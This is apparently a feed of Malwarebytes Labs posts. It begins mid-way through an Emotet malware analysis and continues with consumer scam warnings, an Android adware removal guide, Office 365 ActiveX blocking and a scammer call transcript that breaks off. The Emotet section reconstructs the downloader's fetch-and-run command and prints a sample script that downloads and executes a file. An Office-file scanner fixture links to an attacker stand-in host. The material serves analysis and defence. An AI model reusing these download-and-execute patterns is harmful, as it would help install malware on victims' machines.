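        [Runtime.InteropServices.Marshal]::ZeroFreeBSTR($ptr)
    }
}

# 5. Pull the payload URLs out without depending on the sample's separator.
function Get-PayloadUrl {
    param([Parameter(Mandatory)][string]$Code)
    [regex]::Matches($Code, 'https?://[^\s''"@,;)]+') |
        ForEach-Object { $_.Value } | Sort-Object -Unique
}

$vResult = Unprotect-KeyedSecureString -Path $path -Key $key
if ($vResult -ne $plain) { throw 'round-trip failed: wrong key or corrupt blob' }
Get-PayloadUrl -Code $vResult      # the network IOCs
Remove-Item -Path $path
```

For a real sample, skip steps 1 to 3, point `-Path` at the saved encrypted string and pass the key bytes you recovered from the malware. A wrong key does not yield garbage silently: ConvertTo-SecureString throws, which is your signal that the key or the blob was copied incorrectly.
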

Reconstructing the command-line arguments

Let’s reconstruct the full command-line arguments, mostly as a reward for completing the analysis!

Here’s our PowerShell code, structured and readable:

And here’s the same code, cleaned and beautified:

Now, we will look at all the variables and analyze them one-by-one to reconstruct the complete command-line arguments.


This variable (nsadasd, which the later variables refer to) is assigned the output of New-Object random, which resolves to a System.Random instance.

Later in the code, this variable will be used to generate a random value (between 10,000 and 282,133) to be used as the file name for the downloaded payload. We’ll see that in action when we analyze $NSB.


This variable is assigned the value “(new-object) System.Net.WebClient,” which will be used later with DownloadFile to download content from the Internet with the specified URI and save it as a local file. We can have a look at the value assigned to the variable in the image below. These are the attributes that will be used to start the download of the payload.


As we saw earlier, this variable calls the previously declared variable nsadasd in conjunction with .next, i.e. the System.Random.Next(minValue, maxValue) method. This returns a random integer within the specified range (in this case 10,000 – 282,133). As you can see below, it returns a different value each time it is executed.


$SDC = $env:public + '\' + $NSB + ('.exe');

This variable puts together the absolute path for the payload, complete with the file name that is generated by variable NSB.

We have already looked at the $ADCX variable and how to extract the URIs out of it. Now let’s reconstruct the entire command-line argument that is passed to the system for the malware to successfully download the payload, save it to local file, and execute it.

Here’s the way the code is executed by the malware using variables we analyzed above:

Let’s clean up the code to make it more readable:

Now that we know the value that these variables hold, let’s reconstruct the final command-line arguments that will be passed to the system for execution:

This is what it comes down to in the end:

(New-Object) System.Net.WebClient."DownloadFile"("ToString"(), C:\Users\Public\264415.exe);

The command we have above will initiate the download of the data from the specified URI and save it to a local file as “C:\Users\Public\264415.exe”.


And this final command will start the execution of the payload.
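
Before trusting a reconstruction like the one above, an analyst usually wants every assignment and method call listed without executing any of it. The following is an added example, not part of the original post and not Emotet’s code: it uses PowerShell’s own parser to walk a script’s syntax tree and report what each statement does. The script it walks is constructed to mirror the variable flow described above ($nsadasd, $NSB, $SDC, $ADCX); its URLs, the ‘@’ separator, the try/catch loop and the Invoke-Item execution step are assumptions for the example, not the malware’s actual code.

```powershell
# Added example: static summary of a deobfuscated PowerShell script via its
# AST. Nothing in $sample is executed; it is a constructed stand-in for the
# reconstructed Emotet flow, not the real code.

$sample = @'
$nsadasd = New-Object random;
$YYU = New-Object System.Net.WebClient;
$NSB = $nsadasd.next(10000, 282133);
$ADCX = 'http://example.invalid/a/@http://example.invalid/b/'.Split('@');
$SDC = $env:public + '\' + $NSB + '.exe';
foreach ($url in $ADCX) { try { $YYU."DownloadFile"($url.ToString(), $SDC); Invoke-Item $SDC; break } catch {} }
'@

function Get-ScriptSummary {
    param([Parameter(Mandatory)][string]$Code)

    $tokens = $null; $errors = $null
    $ast = [System.Management.Automation.Language.Parser]::ParseInput($Code, [ref]$tokens, [ref]$errors)
    if ($errors.Count) {
        throw "parse errors: $(($errors | ForEach-Object { $_.Message }) -join '; ')"
    }

    # Every "$var = <expr>" with the right-hand side exactly as written.
    $assignments = $ast.FindAll({ $args[0] -is [System.Management.Automation.Language.AssignmentStatementAst] }, $true) |
        ForEach-Object {
            [pscustomobject]@{ Kind = 'assign'; Target = $_.Left.Extent.Text; Detail = $_.Right.Extent.Text }
        }

    # Every $obj.Method(args) call, including the $obj."Method"() spelling
    # the downloader uses to dodge simple string matching.
    $calls = $ast.FindAll({ $args[0] -is [System.Management.Automation.Language.InvokeMemberExpressionAst] }, $true) |
        ForEach-Object {
            $argText = @($_.Arguments | ForEach-Object { $_.Extent.Text }) -join ', '
            [pscustomobject]@{
                Kind   = 'call'
                Target = '{0}.{1}' -f $_.Expression.Extent.Text, $_.Member.Extent.Text
                Detail = $argText
            }
        }

    # Cmdlet/command invocations (New-Object, Invoke-Item, ...).
    $commands = $ast.FindAll({ $args[0] -is [System.Management.Automation.Language.CommandAst] }, $true) |
        ForEach-Object {
            [pscustomobject]@{ Kind = 'command'; Target = $_.GetCommandName(); Detail = $_.Extent.Text }
        }

    @($assignments) + @($calls) + @($commands)
}

Get-ScriptSummary -Code $sample | Format-Table -AutoSize -Wrap
```

Because the parser never runs the script, this is safe to point at the real decrypted code: the `call` rows give you the DownloadFile target and arguments, and the `command` rows show whatever the sample uses to launch the payload, without a single byte leaving the analysis machine.
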

Emotet: a complex malware

Emotet is one of the most active threats seen in the wild, with campaigns serving this malware daily to potential victims across the globe. The level of code obfuscation and encryption used to hide the code is quite complex and well-executed. In fact, it is one of the most complex downloaders in circulation.

That’s why we felt it was so important to help audiences understand Emotet in sufficient detail so that code variations or other changes in the future do not pose any major challenges to analysts trying to decode this malware. The more you know, the better and faster you are able to protect users from sophisticated malware attacks.

The post Malware analysis: decoding Emotet, part 2 appeared first on Malwarebytes Labs.

PSA: Users with landlines are more vulnerable to scams

Wed, 06/06/2018 - 15:00

It’s time to have “the talk” with your parents, relatives, and loved ones. Anyone still using a landline must be warned: having a home phone makes you particularly vulnerable to scams.

We know here at Malwarebytes that our readers are often the unofficial “IT” department for their families, relatives, and friends. While suggesting to your folks that they discontinue having a landline might not go over well, we still need them to at least be wary of that telephone and the types of calls they might receive on it.

What was once an essential communication tool is now a gateway into your home—a scam delivery mechanism.

Looking at all the inbound calls that my relatives with landlines were receiving left me with a sneaking suspicion that they must have landed on a “victim list” of sorts. Types of scam calls included:

  • Tech support scams (as many as several times a day)
  • Robocalls
  • Charity requests (some more dubious than others)
  • Political calls
  • Surveys
  • IRS/Bank/FBI/Police scams (more tax scams during tax season)

While they do not wish to part with their landlines, I have investigated some other possible solutions for my relatives to avoid scams.

I found some call blocker hardware. However, reviews indicated that this wasn’t particularly effective against scammers. For example, this solution wouldn’t stop tech support scammers that spoof residential numbers.

I also found another device that requires callers to enter a password before the phone will ring at all.

Neither of these felt like an acceptable solution.

Ultimately, knowledge is power, so I’m choosing to explain all the scams that they encountered. In addition, I’d like to point out our tech support scam resource page.

Microsoft tech support

The standard, tried and true tech support scam. These are either initiated from a cold call, “Hi, I’m from Microsoft!” or by driving potential victims to make a call to “Microsoft tech support” themselves after being served a malicious pop-up or browser locker with the specific intent of tricking users into thinking their computer is infected and that they need to pay tech support to fix it.

This scam has many variants. The scammers will claim to be the official support for any number of security products. They will try to impersonate Microsoft or other antivirus companies. They have even tried to impersonate Malwarebytes.

There’s a simple fix for this scam. If you get a call from “Microsoft,” hang up immediately. They will never call you. There is no “Internet Tech Support,” and your connection is not monitored for emanating threats.

Note that Microsoft does not send unsolicited email messages or make unsolicited phone calls to request for personal or financial information, or fix your computer.

Unfortunately, most scammers have now switched to pop-ups that drive victims to initiate the call. Even worse, browlocks, or browser lockers, which effectively prevent further use of the computer, are on the rise.

Banks, FBI, police, and the IRS

Scammers will impersonate institutions of authority.

These types of institutions almost never call. If they do, simply ask for their name and their department, and inform them you will call them right back. A legitimate caller will understand and give you that information; a scammer usually pushes back. Either way, call back only on a number you looked up yourself, never one the caller gave you. (Keep in mind that it is extraordinarily rare for the FBI, banks, IRS, or police to initiate a call.)

Use the Internet to double-check the number to call back. The scammers may try to be helpful and provide you with theirs, but a quick search of a phone number can tell you where it is registered (and whether that matches where the organisation is actually located).

If the person on the other end of the line gets angry or starts threatening you, guess what? They’re a scammer. Remember, they’re trying to instill in you a sense of urgency in order to override your common sense.

Stranded grandchildren

An especially heinous scam, this variant targets grandparents using classic psychological manipulation. The scenario is that their grandchild is calling from jail, arrested for disorderly conduct, and this is their one phone call. Sense of urgency? Check. Fear for a loved one? Check. Common sense thrown out the window? Check.

This scam usually tries to get Grandma to send money “for bail” via MoneyGram or Western Union.

So what happens if you get a call from someone claiming to be your grandchild stuck in jail? Well, much of this scam relies on grandparents being less in-the-know about their grandkids. Do they know what her voice sounds like? Her phone number? Would she never be arrested for disorderly conduct?

If you don’t know for sure, verify with other family members. Text the child’s parents while on the landline with her. Confirm that the family member is who she claims to be by asking personal questions only the relative would know. Scammers will try to fudge through details. Some might start crying. Again, the sense of urgency is pivotal in this scam.

Remember this: If your grandchild were truly in trouble and in jail, would you be the one person she would call? If that’s true, then you’d know if it were her on the other end of the line within seconds. If you’re not her go-to person, then it’s fair to ask more questions and to check in with other family members about the legitimacy of the call. You can even hang up and call back your grandchild on her cell. Chances are, she’ll pick up and have no idea who called you just now.

Caller ID is bunk

Nowadays, you can’t trust your caller ID to flag suspicious numbers. The number shown is supplied by the originating side of the call and is not verified by the network, so a scammer can put anything there. Scammers have long since figured out how to spoof numbers so that they appear to come from a familiar, local area code, which greatly increases their chances of a successful scam. Both the Microsoft tech support call and the fake IRS calls use spoofed caller ID.

I demonstrated how easy spoofing was by using an app on my phone and making a call that appeared to originate from somewhere else. For a technical explanation of how caller ID spoofing works, check out this YouTube video.

  • Never allow anyone remote access to your computer.
  • Is there a pitch for a product/service/subscription? It’s probably a scam.
  • Is there a sense of urgency? IRS + “you will go to jail!” = scam!
  • Caller ID is bunk. Don’t trust it.
  • No legitimate institutions will want Apple iTunes cards or any other gift card as a payment form.

When it comes to using a landline, I don’t think there’s an ideal solution—one that guarantees 100 percent safety. However, armed with the right amount of knowledge, users can easily fend off scams—and stop being afraid of their phone.

Do you know someone who still has a landline? Have you had to explain scams to your relatives? Ever encounter any different scams than the one mentioned by phone? Please don’t hesitate to share your stories with us in the comments.

The post PSA: Users with landlines are more vulnerable to scams appeared first on Malwarebytes Labs.

Social media: A treasure trove of spam and scams

Tue, 06/05/2018 - 17:00

There are two kinds of spam associated with social media. There are spam ads that actually live on social media, and there is spam that comes in your inbox, courtesy of social media. Both thrive by using data from your social media accounts. But how do spammers know how to target you and send you the mails that you are most likely to click on?

There is a real chance that you revealed that information yourself. To understand the relationship between the spam you get in your mailbox, your social media presence, and the ways that criminals try to scam users, you must first understand a few basic principles about how advertising works on social media.

Interest-based advertising

First of all, let’s differentiate between the spam we see on social media and the spam that lands in our inbox but has a relationship with what we interact with on social media. What most people perceive as spam on social media is actually interest-based advertising, which we have talked about before. It is also known as personalized or targeted advertising.

This is the foundation of what people perceive as “Facebook and Google knowing about every search I do and every article I read.” If you are interested in limiting the number of personalized ads you see on social media, Google offers an opt-out of interest-based Google ads in this article.

There are several different options for opting out of interest-based advertising. For example, if you do not want to see any advertisements on the sites you visit, you should look into installing an adblocker. Keep in mind that many sites can only stay in business because they are funded by advertising—that doesn’t mean they have the right to invade your privacy, though.

Logging off

If you are a Facebook user and wondering whether it pays off to log off after every session, according to Facebook, it does. Logging off should theoretically prevent social media sites from picking up on your browsing habits to serve you ads. But others have noticed that devices that come with Facebook installed transmit mysterious information in the background to Facebook’s servers—even when the user is not on Facebook. One thing is sure: as long as you have your Facebook timeline open in a browser and you are using the same browser to surf, Facebook will pick up on your interests.

The Facebook pixel

But that is not the only way companies utilize social media for targeted advertising. The Facebook pixel is another marketing tool. The pixel is a tiny, invisible snippet (an image or script) placed on a website that reports each visit back to Facebook, so the site can re-market to visitors based on which pages they have looked at. To the visitor these pixels are invisible, unless they have an anti-tracking tool installed.

If the visitor is considered interesting enough for the websites’ company, a targeted advertisement will be placed on the visitors’ Facebook page. This is why you will regularly see advertisements from companies whose website you have visited recently. For the webmaster, the pixel offers a lot more perks, but for the visitor it simply means more data mining is taking place.

Share, Like, Tweet, +1

Every site (including our own) that has buttons to share or promote an article on social media does send information about you to their respective owners (again, unless you are using an anti-tracking solution). Based on what articles you share, like, or otherwise engage with, social media networks can spot patterns and recognize your interests.

Spam based on social media data

While interest-based advertising is something we have learned to cope with, even though it may seem scary how much “they” know about us, it is far less dangerous than the spam you may receive based on your online behavior. Why? Let’s dive in.

Development of spam

While the huge, blanket spam campaigns that ensnare millions of email addresses still exist, today’s threat actors are well aware of their diminishing effects. A targeted and well-constructed mail that looks like it comes from your bank offers a much bigger success rate than one coming from some random bank you have never done business with. And the same is true if the spam pretends to be from one of the online shops that you have given a thumbs-up to on social media.

Interest-based advertising is an annoying intrusion on your privacy, but what it delivers is mostly legitimate ads. Targeted spam is far worse: all it takes is one convincing email to trick an unsuspecting user into handing their own crucial information to criminals, who can then infect their computer, steal their data, or simply spy on them. But it’s got to be pretty difficult to get that information from users, right?

How do they know?

Providing spammers with the knowledge to scam you more effectively is probably not what you had in mind when you joined your social media network(s).

But of course, we never reveal sensitive, personal information on our social media accounts. Or do we?

If some scammer had the email associated with this Twitter account, they could pull off a real convincing scam attempt. And if you are the intended target, the threat actors will have the email addresses they need.

It is actually terrifying to know how the tiniest amount of information in the wrong hands can have a devastating impact on your life. Identity theft is a possible nightmare lurking around the corner. Once criminals have a starting point, they can use data from various breaches to gather more intel about their victims.

Recognizing spam: fake login requests vs. Nigerian Prince

There are two main categories of fraudulent spam: fake login requests and the Nigerian Prince variety.

The first category can be very convincing, especially if the emails seem to come from your actual bank. But if your bank sends out emails soliciting login credentials, I would advise switching to another bank (because they shouldn’t be doing that).

The emails themselves will have convincing logos and even appear to come from email addresses belonging to the bank or a credit card provider. And the websites they send you to are exact copies (content wise) of the real one, even including a padlock in the address bar that makes the site look legit. The padlock only means the connection is encrypted; anyone, including a phisher, can obtain a certificate for a domain they control.

Before you check any such mail, remember that your bank should never send you such an email in the first place. But if you look for these signs, you will see right through them. And the signs apply to many other cases like Netflix or iTunes scams. Ways to spot a targeted spam campaign include:

  • Comparing the domain in the email address to the one that your bank owns. You may spot (a small) discrepancy, such as slight spelling differences or random sub-domains.
  • Hovering over the links in the email. Do they lead to your bank’s actual site?
  • Checking the salutations. Does your bank address you with your first name or as “Dear customer”? Not likely. They will generally address you as Mr. or Ms. Last name.
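
The first two checks above come down to one question: is the registrable domain behind the sender address and behind every link really the bank’s? The following is an added example, not part of the original post, that applies those checks (plus the salutation test) to a constructed email. The bank domain, the sender, and the links are all made up for illustration; the domain comparison uses the last two labels of the host name, which is enough for .com/.net but would need the Public Suffix List for names like .co.uk.

```powershell
# Added example: apply the "domain in the address", "where do the links go"
# and "generic salutation" checks to a constructed phishing email.

$bankDomain = 'examplebank.com'   # the domain the real bank owns (assumed)

# Constructed sample. The sender and the first link use a subdomain trick:
# the bank's name is there, but the registrable domain is account-verify.net.
$sampleMail = @'
From: "Example Bank Security" <alerts@examplebank.com.account-verify.net>
Subject: Dear customer, verify your account
<a href="https://examplebank.com.account-verify.net/login">Sign in to Example Bank</a>
<a href="https://www.examplebank.com/help">Help</a>
'@

function Get-RegistrableDomain {
    # Last two labels of a host name: "a.b.examplebank.com" -> "examplebank.com".
    param([Parameter(Mandatory)][string]$HostName)
    $labels = $HostName.ToLowerInvariant().TrimEnd('.').Split('.')
    if ($labels.Count -lt 2) { return $HostName.ToLowerInvariant() }
    return ($labels[-2..-1] -join '.')
}

function Test-PhishingIndicators {
    param(
        [Parameter(Mandatory)][string]$Mail,
        [Parameter(Mandatory)][string]$ExpectedDomain
    )
    $findings = @()

    # Check 1: the domain in the From: address vs. the bank's domain.
    if ($Mail -match '(?m)^From:.*<[^>]+@([^>]+)>') {
        $senderHost = $Matches[1]
        if ((Get-RegistrableDomain $senderHost) -ne $ExpectedDomain) {
            $findings += "sender domain '$senderHost' is not $ExpectedDomain"
        }
    }

    # Check 2: where every link actually goes (what hovering would show).
    foreach ($m in [regex]::Matches($Mail, 'href="(https?://[^"/]+)')) {
        $linkHost = ([uri]($m.Groups[1].Value)).Host
        if ((Get-RegistrableDomain $linkHost) -ne $ExpectedDomain) {
            $findings += "link points to '$linkHost', not $ExpectedDomain"
        }
    }

    # Check 3: a bank that knows you does not write "Dear customer".
    if ($Mail -match '(?i)dear (customer|user|client)') {
        $findings += 'generic salutation'
    }

    return $findings
}

Test-PhishingIndicators -Mail $sampleMail -ExpectedDomain $bankDomain
```

On the constructed sample this reports the sender domain, the login link and the salutation; only the “Help” link, which really goes to www.examplebank.com, passes. That is the point of comparing registrable domains rather than looking for the bank’s name somewhere in the host: examplebank.com.account-verify.net contains the name and still belongs to the attacker.
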
Nigerian scams

These started out as ridiculous messages from a Nigerian prince who claimed, “We have a huge amount of money waiting for you here in a strange and far away country, and all we need from you is a little payment and some information to transfer it into your bank account.” Users duped by this scam would never see their original payment back, let alone the huge amount of cash promised to them. This type of scam has evolved into many different stories and is nowadays also used to recruit money mules.

And, guess what? You don’t need a computer or email to get scammed either. It only takes a little bit of information, a good story, and a friendly victim to get scammed.

A real-world scenario

A woman gets a text from her brother telling her he has a new phone number, but now he can’t log in to his bank, and he needs to make an urgent payment. Can she do it for him? He’ll pay her back as soon as he has everything sorted. The message has her brother’s avatar and the story seems plausible. Not everyone will fall for this, but probably enough to make it worth trying. You don’t need to do much digging on someone’s Facebook profile to gather everything you need to spam and scam victims.

As much as it may pain you, don’t be that friendly person. In the last scenario, you should tell your brother to call you. That isn’t too much to ask if he needs your help that urgently, is it? And dump those scammy emails in the trash where they belong. Should you ever really be in doubt whether some email actually came from your bank, they won’t mind if you call them to verify that information. In fact, they will be glad that you were so cautious.

Now if only we could get everyone to be more cautious about what they share on social media.

Stay safe!

The post Social media: A treasure trove of spam and scams appeared first on Malwarebytes Labs.

A week in security (May 28 – June 3)

Mon, 06/04/2018 - 16:51

Last week on Labs, we talked about the significance of SEO poisoning in the world of search marketing, blackmail attempts against financial institutions in Canada, voice command flaws in smart assistants, survey and potential phishing scams on Instagram, and the latest changes in Office 365.

We also shared our latest intel about America Geeks, a band of tech scammers that we profiled in 2015 and 2016.

Other news

Stay safe, everyone!

The post A week in security (May 28 – June 3) appeared first on Malwarebytes Labs.

Mobile Menace Monday: A race to hidden ads

Mon, 06/04/2018 - 15:00

Who doesn’t love a good motorcycle racing game, right? How about one easily available on Google Play, a “safe” place for all your Android app desires? How about a bike racing game that sticks with you so much, you can’t easily uninstall it? And it displays hidden ads?

Wait, what!? That’s right! In the slideshow below, a game titled Motorcycle Race—Bike Race (package name: com.bikeme.racersm) has rave reviews by users who demand to know how to uninstall the game.

Rev your engines for heightened privileges

So how does one get into such a predicament? That all starts with the install process. Upon installing Motorcycle Race—Bike Race, the first screen asks to Activate device administrator.

Okay, so obviously a bike racing game requesting device administrator rights with permission to Lock the screen is a big red flag. However, if you didn’t catch that, there’s another clue that something is amiss. Look at the app name asking for permission: Media Player. That’s going to make finding the app in the device’s app list rather difficult (hint, hint).

After the initial weirdness of asking for heightened privileges, the app does open and run as advertised.

Don’t expect the game to perform well, though. It runs so slow and choppy, it makes for an unpleasant experience. This is because it’s doing something much more malicious in the background.

Over the handlebars into full screen ads

After the first time the device’s screen is locked/unlocked, it becomes clear why Lock the screen permission is requested. Behold: annoying lock screen ads that take up the whole screen!

Time to chuck this bike: how to uninstall

At this point, any user would be ready to ditch this two-wheeled game. However, if the game was given device administrator rights, this isn’t as straightforward as simply dragging the icon to uninstall. The easiest method would be to let Malwarebytes for Android, which detects this as Android/Trojan.HiddenAds.BiRa, remove the app.

However, you can also uninstall the app manually. Let’s start with dragging the icon to uninstall. That’ll bring up this warning pop-up:

Make sure to note the “Bike Racer is part of the following app: Media Player” text, as you’ll need this information later. Click OK to land here.

Next, select Manage device administrators.

Click the check mark to uncheck Media Player (which is the true name of the bike racing app). Depending on the Android OS version, this could also be an on/off toggle switch.

Here’s an extra reminder, as this is the tricky part: anytime you need to uninstall an app manually, look for the app name listed after the colon in the first warning pop-up (part of the following app: <app name>). It’s easy to assume the app is listed under its icon name (in this case Bike Racer). This mismatch is a clever way to obfuscate removal.

Back to uninstalling the app. After you select the check mark, you’ll get to this screen. Click “Deactivate” at the bottom of the screen.

After device administrator rights are revoked, once again drag the icon to uninstall. This time, you’ll be able to successfully remove the app.

You have the right to not give rights

Even when installing apps from reputable sources like Google Play, be careful when you grant device administrator rights. Although there are times when it’s appropriate to grant such rights to an app, make sure the rights line up with the functionality of the app. Giving device administrator rights to a respectable security app in order to remediate ransomware makes sense. A bike racing game needn’t be given the same rights. Why would they need to lock your screen?

With a little scrutiny and a lot of paying attention to the fine print, you can protect yourself from malicious apps that slip by Google Play’s security parameters. Stay safe out there!

The post Mobile Menace Monday: A race to hidden ads appeared first on Malwarebytes Labs.

Blocks for Flash and others coming to Office 365

Fri, 06/01/2018 - 15:00

If you’re a user of Microsoft Office products such as Word and Excel, you’re probably aware that they’ve been used as inroads for malware for a long, long time. But what about malware attacks without Macros? Sure. Macro malware for Macs? That, too. Malicious documents and spying tools? Danger, Will Robinson.

We have some good news and some bad news.

The good news is that monthly subscribers of Office 365 are getting some new protection in the fight against bogus attachments and malicious files; the bad news is the changes don’t currently apply to standalone versions of Office.

What’s being changed?

Silverlight, Flash, and Shockwave are all getting the chop. If a malware campaign relied on embedding these controls in Office documents, it won’t work for much longer. A combination of seeing these features used in rogue campaigns, generally low legitimate use by product users (when was the last time you embedded Shockwave?), and a rapidly approaching end of the line for both Flash and Silverlight means it made a lot of sense for Microsoft to bring the hammer down.

As the Microsoft blog notes, this alteration makes no difference in situations where the control is activated outside of Office—for example, placing a Flash video into some content using the insert online video feature. Still, this is better than what’s gone before. Hopefully, Microsoft will add more protection for people not using the specified version.

Speaking of which…

Help, I’m not using the correct version!

Microsoft has you covered even if you’re not a monthly subscriber of Office 365, though you’ll have to do a bit of the shovel work yourself to shore up your defences. Roll up your sleeves, set aside a bit of spare time, and delve into this help article, which provides step-by-step instructions to lock things down. Some caveats here:

  1. You’ll have to do a spot of registry editing.
  2. Editing the registry and getting it wrong can cause all sorts of problems. Ensure you’ve made a backup before touching it. Better safe than sorry!

What kind of danger are we talking?

Things like rogue embedded Flash aren’t just theoretical. It’s something we see a lot of. For example, here’s an exploit making use of rogue Excel documents targeting South Koreans via Flash.

Here’s the booby-trapped Excel sheet in action, complete with hidden ActiveX object highlighted in white:


From here, it pings one of several websites with a unique identifier, the Flash version on board, and the Operating System version. If the stars align, then it’s exploit time with a side slice of Remote Administration Tool to boot.

This is a pretty sophisticated attack, but there’s plenty more out there that are as basic as they come. Either way, they get the results they need to infect an organisation.

Sounds nasty. When does the block go live?

Microsoft has said that the block rolls into place for Office 365 monthly users next month, with people using the Semi-Annual Targeted Channel and the Semi-Annual Channel receiving theirs in September 2018 and January 2019, respectively.

Of course, you can roll the blocks back yourself if you really want to (is that going to be a thing?) by following these instructions. Warning: once again, this involves some registry editing, so please make sure you’re comfortable before altering anything. Of course, if you have a monthly 365 package, it’s quite possible you’ll have an IT team performing said edits for your organisation anyway.

What else can we do to lock down Office files?

Quite a few things, actually. In more general attacks, scammers will try to convince potential victims to give Windows administrator permissions to rogue files; when that happens, it’s infection time. By the same token, they’ll try everything to convince someone to click through a bunch of “Enable Macro” prompts in an Office file. If you don’t need macros, you should consider disabling them as soon as possible.

You can also apply a little elbow grease, and think long and hard before opening up an attachment sent your way. If you want to play it safe, always check with the sender before opening up a Word or Excel document. Don’t just stop at email confirmation; if the account has been compromised, then of course you’re going to receive a reply that says, “The attachment is definitely safe, honest.” Pick up the phone if need be. A little caution never hurt anyone, right?
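The rogue-ActiveX campaign described above and the advice about checking attachments both come down to the same question: what is actually inside this Office file? As an added example (not code from the post, and not a Microsoft tool), here is a small Python triage script that opens an OOXML document (docx/xlsx/pptx are zip containers) and reports macro projects, ActiveX parts and the class IDs they instantiate, embedded OLE objects, and relationships that point outside the file. The CLSID table holds the well-known class IDs for the Flash, Shockwave and Silverlight controls; treat those values as assumptions to check against Microsoft’s own article. The sample workbook is constructed in memory so the script runs offline.

```python
import io
import re
import zipfile

# Well-known ActiveX class IDs for the three controls Office 365 is blocking.
# These are assumptions for this example; verify them against Microsoft's
# article before relying on them in production.
BLOCKED_CLSIDS = {
    "D27CDB6E-AE6D-11CF-96B8-444553540000": "Adobe Flash Player",
    "166B1BCA-3F9C-11CF-8075-444553540000": "Adobe Shockwave (Director)",
    "DFEAF541-F3E1-4C24-ACAC-99C30715084A": "Microsoft Silverlight",
}

CLSID_RE = re.compile(r"\{?([0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12})\}?", re.I)
EXTERNAL_REL_RE = re.compile(r'TargetMode\s*=\s*"External"', re.I)


def scan_ooxml(document: bytes) -> list:
    """Return (kind, detail) findings for an OOXML (docx/xlsx/pptx) file.

    Kinds: "macros" (a vbaProject.bin part), "activex" (an ActiveX part,
    labelled with the control it instantiates), "embedded-object" (OLE
    payloads under embeddings/) and "external-link" (a relationship that
    points outside the file, e.g. a remote template or object).
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(document)) as zf:
        for name in zf.namelist():
            lower = name.lower()
            if lower.endswith("vbaproject.bin"):
                findings.append(("macros", name))
            elif "/activex/" in lower and lower.endswith(".xml"):
                text = zf.read(name).decode("utf-8", "replace")
                for match in CLSID_RE.finditer(text):
                    clsid = match.group(1).upper()
                    label = BLOCKED_CLSIDS.get(clsid, "unrecognised control")
                    findings.append(("activex", f"{name}: {{{clsid}}} {label}"))
            elif "/embeddings/" in lower:
                findings.append(("embedded-object", name))
            elif lower.endswith(".rels"):
                text = zf.read(name).decode("utf-8", "replace")
                if EXTERNAL_REL_RE.search(text):
                    findings.append(("external-link", name))
    return findings


def verdict(findings: list) -> str:
    """Turn findings into a triage decision for an inbound attachment."""
    for kind, detail in findings:
        if kind in ("macros", "external-link"):
            return "quarantine"
        if kind == "activex" and any(label in detail for label in BLOCKED_CLSIDS.values()):
            return "quarantine"
    return "review" if findings else "clean"


def build_sample_xlsx() -> bytes:
    """Constructed sample: a minimal xlsx carrying a Flash ActiveX control,
    a VBA project stub and an external OLE relationship. It is not a real
    malicious file, just enough structure to exercise every check above."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        zf.writestr("xl/worksheets/sheet1.xml", "<worksheet/>")
        zf.writestr(
            "xl/activeX/activeX1.xml",
            '<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" '
            'ax:classid="{D27CDB6E-AE6D-11CF-96B8-444553540000}" '
            'ax:persistence="persistStreamInit"/>',
        )
        zf.writestr("xl/activeX/activeX1.bin", b"\x00" * 32)
        zf.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24)
        zf.writestr(
            "xl/worksheets/_rels/sheet1.xml.rels",
            '<Relationships><Relationship Id="rId1" '
            'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
            'Target="http://attacker.invalid/loader.swf" TargetMode="External"/></Relationships>',
        )
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_xlsx()
    for kind, detail in scan_ooxml(sample):
        print(f"{kind:16} {detail}")
    print("verdict:", verdict(scan_ooxml(sample)))
```

Point it at a real attachment with `scan_ooxml(open(path, "rb").read())`. It deliberately does not parse the ActiveX or OLE binaries themselves; the presence of a Flash control or a remote relationship in a spreadsheet from an unknown sender is enough to send it for analysis rather than open it.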

For now, familiarise yourself with the upcoming changes, and have a think about whether or not you still need some of the controls penciled in for blocking. We’ll be keeping an eye out for the response to the changes, as demand for applying similar controls for other versions of Office is likely to be high. Fingers crossed, Microsoft will take heed and widen the rollout.

The post Blocks for Flash and others coming to Office 365 appeared first on Malwarebytes Labs.


A conversation with America Geeks

Thu, 05/31/2018 - 16:00

Thanks to NeeP for contributing significant research. You can check out NeeP’s YouTube channel here.

Malwarebytes has written quite a bit about tech support scammers, typically focusing on new scam techniques as they arise with new threat actor groups. But sometimes our research discovers scammers who persist with the same techniques, the same pitches, and the same IP abuse, no matter how many times we catch them.

We first published on America Geeks (then known as Geeks Technical Support) in 2015, noting their attempts to use Malwarebytes’ intellectual property to pose as us and defraud their customers. After a series of takedowns and abuse complaints, we revisited America Geeks in 2016—still using Malwarebytes image assets, still scamming.

And lastly, in March, Malwarebytes Labs researchers found them again using Malwarebytes to sell their scam, this time targeting French users. We were content to continue publishing on America Geeks indefinitely, but then they decided to open a ticket with the Malwarebytes help desk.

In further social media comments that have since been deleted, this person identified as being associated with America Geeks, and was quite concerned about our 2016 post on the company. We did not follow up.

On May 1, our customer support team got a phone call from “Kevin Nash” at the “Better Business Bureau” who informed us that America Geeks was no more, and our 2016 blog post was causing problems for someone who had bought their infrastructure. (At the time, their website was still up and not at all defunct.)

Why the Better Business Bureau would serve as an intermediary between a defunct business’ CEO in one country and a tech company in another was left unexplained. Why “Kevin Nash” had an Indian cell phone number and a heavy Indian accent was left unexplained. We did not follow up.

He provided contact details that we have redacted.

“Kevin Nash” then contacted us as the personal attorney of the former America Geeks CEO. He alleged that Kunal Bansal of America Geeks was at risk of physical harm from our 2016 blog post, and needed us to take it down. Further, America Geeks was shut down, and therefore no longer a threat to anyone. Given the seriousness of the claims, we followed up. Here’s the transcript for three calls conducted with Kevin Nash:

Call one

America Geeks (AG): Hey, this is Kevin. How you doing buddy?

Malwarebytes (MWB): Oh, is this Kevin…Kevin Nash?

AG: Kevin Nash.

MWB: Okay, I’m sorry. Are you calling—are you from the Better Business Bureau? ’Cause I think that’s what the message I had gotten said.

AG: Uh…no…no no. I’m not from Better Business Bureau, I’m with the legal team with the company that the review is about.

MWB: You’re with the legal team? What company is it? Geek? Geeks? Is it…

AG: Yeah. Okay, so the thing is, that Geeks company is closed. Alright?

MWB: Okay.

